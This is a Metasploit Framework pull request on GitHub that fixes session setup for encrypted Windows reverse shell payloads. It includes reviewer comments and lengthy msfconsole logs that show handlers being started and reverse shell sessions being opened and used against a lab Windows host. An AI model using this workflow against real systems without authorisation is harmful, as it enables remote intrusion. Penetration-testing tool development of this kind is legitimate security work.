Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Fixes issues with encrypted payloads by moving session bootstrap logic #15600

Merged
merged 4 commits into from
Sep 23, 2021
Merged

Fixes issues with encrypted payloads by moving session bootstrap logic #15600

merged 4 commits into from
Sep 23, 2021

Conversation

agalway-r7
Copy link
Contributor

@agalway-r7 agalway-r7 commented Aug 26, 2021
edited by cdelafuente-r7
Loading

Fixes #15145

image
The encrypted payloads make use of a ChaCha Cipher that, in this current implementation, depends on a read/write cycle. IE msfconsole writes, then it reads a response. Performing two writes or reads in a row will break the cipher during session setup.

By moving the logic that gathers session info for the command_shell's initial communication with msfconsole from the process_autorun method to the bootstrap method, we ensure that this functionality is always carried out before any commands are sent to a victim. This is better functionality for command_shells in general.

This change also ensures that an encrypted shell will update it's cipher with a new key and nonce, before calling the inheritedcommand_shell bootstrap method as super to read the initial communication from the victim correctly, and auto verify the session accurately if the datastore variable is set.

These changes also have the added benefit of populating the info field of a session. This means the information field is now populated for encrypted and regular shells when running the sessions command (it's cut off after 77 chars IIRC):

image

This above functionality is a freebie.

The changes made to line 800-806 however are a new addition. It means that the banner will be displayed every time a session is interacted with IF it was captured correctly:
image

Have also added warning to encrypted payloads that will warn the user that the DB is not available, and the required mingw install is not present:
image

Tested with the following payloads, each with AutoVerifySession set to true and false on Windows 7:

payload/windows/encrypted_shell/reverse_tcp
payload/windows/x64/encrypted_shell/reverse_tcp
payload/windows/encrypted_shell_reverse_tcp
payload/windows/x64/encrypted_shell_reverse_tcp

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • generate any of the above payloads
  • to_handler with AutoVerifySession set to true
  • execute payload
  • ensure shell is created successfully
  • jobs -K
  • to_handler with AutoVerifySession set to false
  • execute payload
  • ensure shell is created successfully

Thanks to @space-r7 for the assists!

TODO:

  • Encrypted shells that have a listener generated with to_handler do not inform users that a session has been created
  • [ ]Spamming enter on any of the above shells generates garbage output (Shell may break or may remain operational):
    • image
  • multi/handler doesn't work with any of the above shells when using a generic payload
    • Not fixed, just determined that generic handlers can't work with these payloads since they'd need the nonce and key values and they don't handle them atm
  • Upgrading encrypted sessions to meterpreter doesn't work
    • Not fixed, existing functionality and well sign posted when running sessions -u with an encrypted session

@agalway-r7 agalway-r7 added the bug label Aug 26, 2021
@adfoster-r7
Copy link
Contributor

This seems sane to me at first glance, but @smcintyre-r7 will definitely be more aware of the nuances than me 🕵️

@agalway-r7 agalway-r7 force-pushed the encrypted-shell-fix branch 5 times, most recently from e99c229 to f8b4833 Compare September 7, 2021 12:36
@agalway-r7 agalway-r7 force-pushed the encrypted-shell-fix branch 2 times, most recently from 2c76740 to 45d8737 Compare September 10, 2021 16:46
@agalway-r7 agalway-r7 marked this pull request as ready for review September 10, 2021 16:56
cdelafuente-r7
cdelafuente-r7 reviewed Sep 22, 2021
View reviewed changes
Copy link
Contributor

@cdelafuente-r7 cdelafuente-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks for fixing this @agalway-r7! I left a few minor comments for you to review. I will start testing now and let you know if I run into issues. Thanks!

lib/msf/base/sessions/command_shell.rb Outdated Show resolved Hide resolved
lib/msf/base/sessions/command_shell.rb Outdated Show resolved Hide resolved
lib/msf/base/sessions/command_shell.rb Outdated Show resolved Hide resolved
lib/msf/base/sessions/command_shell.rb Outdated Show resolved Hide resolved
@cdelafuente-r7 cdelafuente-r7 self-assigned this Sep 22, 2021
@cdelafuente-r7
Copy link
Contributor

Thanks for updating this @agalway-r7 ! I tested the four encrypted payloads and verified a valid session was created with and without AutoVerifySession set. I also made sure the non-encrypted payload still worked and correctly displayed the banner. Please, see the outputs below for details. I'll go ahead and land it.

Example output

Reverse encrypted shell (x64 - staged) 
msf6 payload(windows/x64/encrypted_shell/reverse_tcp) > set LHOST 192.168.100.231
LHOST => 192.168.100.231
msf6 payload(windows/x64/encrypted_shell/reverse_tcp) > set LHOST 192.168.100.231
LHOST => 192.168.100.231
msf6 payload(windows/x64/encrypted_shell/reverse_tcp) > set AutoVerifySession true
AutoVerifySession => true
msf6 payload(windows/x64/encrypted_shell/reverse_tcp) > options

Module options (payload/windows/x64/encrypted_shell/reverse_tcp):

   Name            Current Setting                   Required  Description
   ----            ---------------                   --------  -----------
   CallWSAStartup  true                              no        Adds the function that initializes the Winsock library
   ChachaKey       92afe8a5eadfb27b94e261d2e972c41e  no        The initial key to encrypt payload traffic with
   ChachaNonce     e9a8540da431                      no        The initial nonce to use to encrypt payload traffic with
   EXITFUNC        process                           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST           192.168.100.231                   yes       The listen address (an interface may be specified)
   LPORT           4444                              yes       The listen port

msf6 payload(windows/x64/encrypted_shell/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0
msf6 payload(windows/x64/encrypted_shell/reverse_tcp) >
[*] Started reverse TCP handler on 192.168.100.231:4444

msf6 payload(windows/x64/encrypted_shell/reverse_tcp) >
[*] Sending stage (3584 bytes) to 192.168.100.197
[*] Encrypted reverse shell session 1 opened (192.168.100.231:4444 -> 192.168.100.197:50160) at 2021-09-23 09:16:25 -0400

msf6 payload(windows/x64/encrypted_shell/reverse_tcp) > sessions

Active sessions
===============

  Id  Name  Type                   Information  Connection
  --  ----  ----                   -----------  ----------
  1         Encrypted x64/windows               192.168.100.231:4444 -> 192.168.100.197:50160 (192.168.100.197)

msf6 payload(windows/x64/encrypted_shell/reverse_tcp) > sessions -1
[*] Starting interaction with 1...


C:\Users\n00tmeg\Desktop>whoami
whoami
desktop-uuqe0b4\n00tmeg

C:\Users\n00tmeg\Desktop>^C
Abort session 1? [y/N]  y

[*] 192.168.100.197 - Encrypted reverse shell session 1 closed.  Reason: User exit
msf6 payload(windows/x64/encrypted_shell/reverse_tcp) > jobs -K
Stopping all jobs...
msf6 payload(windows/x64/encrypted_shell/reverse_tcp) > set AutoVerifySession false
AutoVerifySession => false
msf6 payload(windows/x64/encrypted_shell/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 4
msf6 payload(windows/x64/encrypted_shell/reverse_tcp) >
[*] Started reverse TCP handler on 192.168.100.231:4444

msf6 payload(windows/x64/encrypted_shell/reverse_tcp) >
[*] Sending stage (3584 bytes) to 192.168.100.197
[*] Encrypted reverse shell session 4 opened (192.168.100.231:4444 -> 192.168.100.197:50167) at 2021-09-23 09:26:40 -0400

msf6 payload(windows/x64/encrypted_shell/reverse_tcp) > sessions

Active sessions
===============

  Id  Name  Type                   Information  Connection
  --  ----  ----                   -----------  ----------
  4         Encrypted x64/windows               192.168.100.231:4444 -> 192.168.100.197:50167 (192.168.100.197)

msf6 payload(windows/x64/encrypted_shell/reverse_tcp) > sessions -1
[*] Starting interaction with 4...

Microsoft Windows [Version 10.0.18363.1440]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\n00tmeg\Desktop>
C:\Users\n00tmeg\Desktop>whoami
whoami
desktop-uuqe0b4\n00tmeg

C:\Users\n00tmeg\Desktop>^C
Abort session 4? [y/N]  y

[*] 192.168.100.197 - Encrypted reverse shell session 4 closed.  Reason: User exit
Reverse encrypted shell (x64 - single) 
msf6 payload(windows/x64/encrypted_shell_reverse_tcp) > set AutoVerifySession true
AutoVerifySession => true
msf6 payload(windows/x64/encrypted_shell_reverse_tcp) > set LHOST 192.168.100.231
LHOST => 192.168.100.231
msf6 payload(windows/x64/encrypted_shell_reverse_tcp) > set verbose true
verbose => true
msf6 payload(windows/x64/encrypted_shell_reverse_tcp) > options

Module options (payload/windows/x64/encrypted_shell_reverse_tcp):

   Name            Current Setting                   Required  Description
   ----            ---------------                   --------  -----------
   CallWSAStartup  true                              no        Adds the function that initializes the Winsock library
   ChachaKey       88e654d6a199379be8ac24fe40190c11  no        The initial key to encrypt payload traffic with
   ChachaNonce     abaf0a159b96                      no        The initial nonce to use to encrypt payload traffic with
   EXITFUNC        process                           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST           192.168.100.231                   yes       The listen address (an interface may be specified)
   LPORT           4444                              yes       The listen port

msf6 payload(windows/x64/encrypted_shell_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 2
msf6 payload(windows/x64/encrypted_shell_reverse_tcp) >
[*] Started reverse TCP handler on 192.168.100.231:4444

msf6 payload(windows/x64/encrypted_shell_reverse_tcp) > [*] Encrypted reverse shell session 2 opened (192.168.100.231:4444 -> 192.168.100.197:50161) at 2021-09-23 09:20:32 -0400

msf6 payload(windows/x64/encrypted_shell_reverse_tcp) > sessions

Active sessions
===============

  Id  Name  Type                   Information  Connection
  --  ----  ----                   -----------  ----------
  2         Encrypted x64/windows               192.168.100.231:4444 -> 192.168.100.197:50161 (192.168.100.197)

msf6 payload(windows/x64/encrypted_shell_reverse_tcp) > sessions -1
[*] Starting interaction with 2...


C:\Users\n00tmeg\Desktop>whoami
whoami
desktop-uuqe0b4\n00tmeg

C:\Users\n00tmeg\Desktop>^C
Abort session 2? [y/N]  y

[*] 192.168.100.197 - Encrypted reverse shell session 2 closed.  Reason: User exit
msf6 payload(windows/x64/encrypted_shell_reverse_tcp) > jobs -K
Stopping all jobs...
msf6 payload(windows/x64/encrypted_shell_reverse_tcp) > set AutoVerifySession false
AutoVerifySession => false
msf6 payload(windows/x64/encrypted_shell_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 3
msf6 payload(windows/x64/encrypted_shell_reverse_tcp) >
[*] Started reverse TCP handler on 192.168.100.231:4444

msf6 payload(windows/x64/encrypted_shell_reverse_tcp) > [*] Encrypted reverse shell session 3 opened (192.168.100.231:4444 -> 192.168.100.197:50164) at 2021-09-23 09:24:46 -0400

msf6 payload(windows/x64/encrypted_shell_reverse_tcp) > sessions

Active sessions
===============

  Id  Name  Type                   Information  Connection
  --  ----  ----                   -----------  ----------
  3         Encrypted x64/windows               192.168.100.231:4444 -> 192.168.100.197:50164 (192.168.100.197)

msf6 payload(windows/x64/encrypted_shell_reverse_tcp) > sessions -1
[*] Starting interaction with 3...

Microsoft Windows [Version 10.0.18363.1440]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\n00tmeg\Desktop>
C:\Users\n00tmeg\Desktop>whoami
whoami
desktop-uuqe0b4\n00tmeg

C:\Users\n00tmeg\Desktop>^C
Abort session 3? [y/N]  y

[*] 192.168.100.197 - Encrypted reverse shell session 3 closed.  Reason: User exit
Reverse encrypted shell (x86 - staged) 
msf6 payload(windows/encrypted_shell/reverse_tcp) > set LHOST 192.168.100.231
LHOST => 192.168.100.231
msf6 payload(windows/encrypted_shell/reverse_tcp) > set verbose true
verbose => true
msf6 payload(windows/encrypted_shell/reverse_tcp) > set AutoVerifySession true
AutoVerifySession => true
msf6 payload(windows/encrypted_shell/reverse_tcp) > options

Module options (payload/windows/encrypted_shell/reverse_tcp):

   Name            Current Setting                   Required  Description
   ----            ---------------                   --------  -----------
   CallWSAStartup  true                              no        Adds the function that initializes the Winsock library
   ChachaKey       5b55e9bffc73dec3c1db88c781e74c34  no        The initial key to encrypt payload traffic with
   ChachaNonce     4d9b1d4f5082                      no        The initial nonce to use to encrypt payload traffic with
   EXITFUNC        process                           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST           192.168.100.231                   yes       The listen address (an interface may be specified)
   LPORT           4444                              yes       The listen port

msf6 payload(windows/encrypted_shell/reverse_tcp) > jobs -K
Stopping all jobs...
msf6 payload(windows/encrypted_shell/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 6
msf6 payload(windows/encrypted_shell/reverse_tcp) >
[*] Started reverse TCP handler on 192.168.100.231:4444

msf6 payload(windows/encrypted_shell/reverse_tcp) >
[*] Sending stage (4096 bytes) to 192.168.100.197

msf6 payload(windows/encrypted_shell/reverse_tcp) > [*] Encrypted reverse shell session 5 opened (192.168.100.231:4444 -> 192.168.100.197:50169) at 2021-09-23 09:32:06 -0400

msf6 payload(windows/encrypted_shell/reverse_tcp) > sessions

Active sessions
===============

  Id  Name  Type                   Information  Connection
  --  ----  ----                   -----------  ----------
  5         Encrypted x86/windows               192.168.100.231:4444 -> 192.168.100.197:50169 (192.168.100.197)

msf6 payload(windows/encrypted_shell/reverse_tcp) > sessions -1
[*] Starting interaction with 5...


C:\Users\n00tmeg\Desktop>whoami
whoami
desktop-uuqe0b4\n00tmeg

C:\Users\n00tmeg\Desktop>^C
Abort session 5? [y/N]  y

[*] 192.168.100.197 - Encrypted reverse shell session 5 closed.  Reason: User exit
msf6 payload(windows/encrypted_shell/reverse_tcp) > set AutoVerifySession false
AutoVerifySession => false
msf6 payload(windows/encrypted_shell/reverse_tcp) > jobs -K
Stopping all jobs...
msf6 payload(windows/encrypted_shell/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 7
msf6 payload(windows/encrypted_shell/reverse_tcp) >
[*] Started reverse TCP handler on 192.168.100.231:4444

msf6 payload(windows/encrypted_shell/reverse_tcp) >
[*] Sending stage (4096 bytes) to 192.168.100.197
[*] Encrypted reverse shell session 6 opened (192.168.100.231:4444 -> 192.168.100.197:50171) at 2021-09-23 09:32:42 -0400

msf6 payload(windows/encrypted_shell/reverse_tcp) > sessions

Active sessions
===============

  Id  Name  Type                   Information  Connection
  --  ----  ----                   -----------  ----------
  6         Encrypted x86/windows               192.168.100.231:4444 -> 192.168.100.197:50171 (192.168.100.197)

msf6 payload(windows/encrypted_shell/reverse_tcp) > sessions -1
[*] Starting interaction with 6...

Microsoft Windows [Version 10.0.18363.1440]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\n00tmeg\Desktop>
C:\Users\n00tmeg\Desktop>whoami
whoami
desktop-uuqe0b4\n00tmeg

C:\Users\n00tmeg\Desktop>^C
Abort session 6? [y/N]  y

[*] 192.168.100.197 - Encrypted reverse shell session 6 closed.  Reason: User exit
Reverse encrypted shell (x86 - single) 
msf6 payload(windows/encrypted_shell_reverse_tcp) > set LHOST 192.168.100.231
LHOST => 192.168.100.231
msf6 payload(windows/encrypted_shell_reverse_tcp) > set verbose true
verbose => true
msf6 payload(windows/encrypted_shell_reverse_tcp) > set AutoVerifySession true
AutoVerifySession => true
msf6 payload(windows/encrypted_shell_reverse_tcp) > options

Module options (payload/windows/encrypted_shell_reverse_tcp):

   Name            Current Setting                   Required  Description
   ----            ---------------                   --------  -----------
   CallWSAStartup  true                              no        Adds the function that initializes the Winsock library
   ChachaKey       1f1acce67779937b75576a3ee0ab907c  no        The initial key to encrypt payload traffic with
   ChachaNonce     6615ac4b8dbb                      no        The initial nonce to use to encrypt payload traffic with
   EXITFUNC        process                           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST           192.168.100.231                   yes       The listen address (an interface may be specified)
   LPORT           4444                              yes       The listen port

msf6 payload(windows/encrypted_shell_reverse_tcp) > jobs -K
Stopping all jobs...
msf6 payload(windows/encrypted_shell_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 8
msf6 payload(windows/encrypted_shell_reverse_tcp) >
[*] Started reverse TCP handler on 192.168.100.231:4444
[*] Encrypted reverse shell session 7 opened (192.168.100.231:4444 -> 192.168.100.197:50172) at 2021-09-23 09:35:58 -0400

msf6 payload(windows/encrypted_shell_reverse_tcp) > sessions

Active sessions
===============

  Id  Name  Type                   Information  Connection
  --  ----  ----                   -----------  ----------
  7         Encrypted x86/windows               192.168.100.231:4444 -> 192.168.100.197:50172 (192.168.100.197)

msf6 payload(windows/encrypted_shell_reverse_tcp) > sessions -1
[*] Starting interaction with 7...


C:\Users\n00tmeg\Desktop>whoami
whoami
desktop-uuqe0b4\n00tmeg

C:\Users\n00tmeg\Desktop>^C
Abort session 7? [y/N]  y

[*] 192.168.100.197 - Encrypted reverse shell session 7 closed.  Reason: User exit
msf6 payload(windows/encrypted_shell_reverse_tcp) > set AutoVerifySession false
AutoVerifySession => false
msf6 payload(windows/encrypted_shell_reverse_tcp) > jobs -K
Stopping all jobs...
msf6 payload(windows/encrypted_shell_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 9
msf6 payload(windows/encrypted_shell_reverse_tcp) >
[*] Started reverse TCP handler on 192.168.100.231:4444

msf6 payload(windows/encrypted_shell_reverse_tcp) > [*] Encrypted reverse shell session 8 opened (192.168.100.231:4444 -> 192.168.100.197:50173) at 2021-09-23 09:36:27 -0400

msf6 payload(windows/encrypted_shell_reverse_tcp) > sessions

Active sessions
===============

  Id  Name  Type                   Information  Connection
  --  ----  ----                   -----------  ----------
  8         Encrypted x86/windows               192.168.100.231:4444 -> 192.168.100.197:50173 (192.168.100.197)

msf6 payload(windows/encrypted_shell_reverse_tcp) > sessions -1
[*] Starting interaction with 8...

Microsoft Windows [Version 10.0.18363.1440]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\n00tmeg\Desktop>
C:\Users\n00tmeg\Desktop>whoami
whoami
desktop-uuqe0b4\n00tmeg

C:\Users\n00tmeg\Desktop>^C
Abort session 8? [y/N]  y

[*] 192.168.100.197 - Encrypted reverse shell session 8 closed.  Reason: User exit
Non-encrypted reverse shell (x64 - staged) 
msf6 payload(windows/x64/shell/reverse_tcp) > set LHOST 192.168.100.231
LHOST => 192.168.100.231
msf6 payload(windows/x64/shell/reverse_tcp) > set verbose true
verbose => true
msf6 payload(windows/x64/shell/reverse_tcp) > set AutoVerifySession true
AutoVerifySession => true
msf6 payload(windows/x64/shell/reverse_tcp) > options

Module options (payload/windows/x64/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.100.231  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

msf6 payload(windows/x64/shell/reverse_tcp) > jobs -K
Stopping all jobs...
msf6 payload(windows/x64/shell/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 10
msf6 payload(windows/x64/shell/reverse_tcp) >
[*] Started reverse TCP handler on 192.168.100.231:4444

msf6 payload(windows/x64/shell/reverse_tcp) >
[*] Sending stage (336 bytes) to 192.168.100.197
[*] Command shell session 9 opened (192.168.100.231:4444 -> 192.168.100.197:50183) at 2021-09-23 09:41:16 -0400

msf6 payload(windows/x64/shell/reverse_tcp) > sessions

Active sessions
===============

  Id  Name  Type               Information                                                      Connection
  --  ----  ----               -----------                                                      ----------
  9         shell x64/windows  Shell Banner: Microsoft Windows [Version 10.0.18363.1440] -----  192.168.100.231:4444 -> 192.168.100.197:50183 (192.168.100.197)

msf6 payload(windows/x64/shell/reverse_tcp) > sessions -1
[*] Starting interaction with 9...


Shell Banner:
Microsoft Windows [Version 10.0.18363.1440]
-----


C:\Users\n00tmeg\Desktop>whoami
whoami
desktop-uuqe0b4\n00tmeg

C:\Users\n00tmeg\Desktop>^C
Abort session 9? [y/N]  y

[*] 192.168.100.197 - Command shell session 9 closed.  Reason: User exit
msf6 payload(windows/x64/shell/reverse_tcp) > set AutoVerifySession false
AutoVerifySession => false
msf6 payload(windows/x64/shell/reverse_tcp) > jobs -K
Stopping all jobs...
msf6 payload(windows/x64/shell/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 11
msf6 payload(windows/x64/shell/reverse_tcp) >
[*] Started reverse TCP handler on 192.168.100.231:4444

msf6 payload(windows/x64/shell/reverse_tcp) >
[*] Sending stage (336 bytes) to 192.168.100.197
[*] Command shell session 10 opened (192.168.100.231:4444 -> 192.168.100.197:50184) at 2021-09-23 09:41:55 -0400

msf6 payload(windows/x64/shell/reverse_tcp) > sessions

Active sessions
===============

  Id  Name  Type               Information  Connection
  --  ----  ----               -----------  ----------
  10        shell x64/windows               192.168.100.231:4444 -> 192.168.100.197:50184 (192.168.100.197)

msf6 payload(windows/x64/shell/reverse_tcp) > sessions -1
[*] Starting interaction with 10...

Microsoft Windows [Version 10.0.18363.1440]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\n00tmeg\Desktop>
C:\Users\n00tmeg\Desktop>whoami
whoami
desktop-uuqe0b4\n00tmeg

C:\Users\n00tmeg\Desktop>^C
Abort session 10? [y/N]  y

[*] 192.168.100.197 - Command shell session 10 closed.  Reason: User exit

@cdelafuente-r7 cdelafuente-r7 merged commit d3eff6f into rapid7:master Sep 23, 2021
@cdelafuente-r7 cdelafuente-r7 added the rn-fix release notes fix label Sep 23, 2021
@cdelafuente-r7
Copy link
Contributor

Release Notes

This fixes an issue with encrypted payloads during session setup. The logic that gathers session info is now located in the bootstrap method, which ensures that this functionality is always carried out before any commands are sent.

@drforbin drforbin mentioned this pull request Nov 16, 2021
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@space-r7 space-r7 space-r7 left review comments

@cdelafuente-r7 cdelafuente-r7 cdelafuente-r7 left review comments

@adfoster-r7 adfoster-r7 adfoster-r7 left review comments

Assignees

@cdelafuente-r7 cdelafuente-r7

Labels
bug rn-fix release notes fix
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

when using windows/x64/encrypted_shell_reverse_tcp I dont get shell
4 participants
@agalway-r7 @adfoster-r7 @cdelafuente-r7 @space-r7